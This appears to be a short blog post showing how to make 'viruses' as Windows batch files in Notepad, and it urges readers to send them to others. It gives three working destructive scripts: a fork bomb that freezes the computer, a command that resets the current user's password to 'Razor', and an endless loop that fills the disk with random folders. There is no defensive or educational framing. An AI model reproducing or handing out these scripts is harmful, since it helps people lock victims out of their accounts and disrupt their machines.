|

Hi I am share How to How to Create a Virus with Notepad  Its really working. Make Virus and send  

How To Create Your Own Virus Using Batch Scripting

All code open notepad and save .bat file 
So lest start 

1 Freezes the CPU

  %0|%0
 save cpu.bat

Change Computer Password

@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::
 save anything.bat

Make an Infinity of Folders

@echo off
:ztuts
md %random%
goto ztuts

0 comments:

Post a Comment